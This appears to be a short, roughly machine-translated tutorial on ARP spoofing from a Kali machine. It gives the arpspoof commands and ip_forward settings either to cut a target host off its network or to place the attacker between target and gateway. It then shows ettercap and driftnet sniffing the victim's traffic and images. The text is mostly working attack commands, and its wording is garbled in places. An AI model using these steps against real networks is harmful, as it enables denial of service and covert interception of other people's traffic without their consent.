apr divided off network with forwarding
In / proc / sys / net / ipv4 / ip_forward file
If set to 0 for off net (the default setting), if it is 1 for forward
1, off net
Set / proc / sys / net / ipv4 / ip_forward value 0
arpspoof -i eth0 -t 192.168.20.10 192.168.20.1
-i interface specifies the network card eth0, -t target goal (192.168.20.10) 192.168.20.1 (gateway)
2, traffic forwarding
Set / proc / sys / net / ipv4 / ip_forward is 1
arpspoof -i eth0 -t 192.168.20.6 192.168.20.99
192.168.20.6 as the destination host, 192.168.20.99 as kali attack aircraft
2.1, then capture the traffic situation ettercap
ettercap -Tq -i eth0 # T represents the text display text q represents quiet
2.2, you can also capture images using driftnet
driftnet -i eth0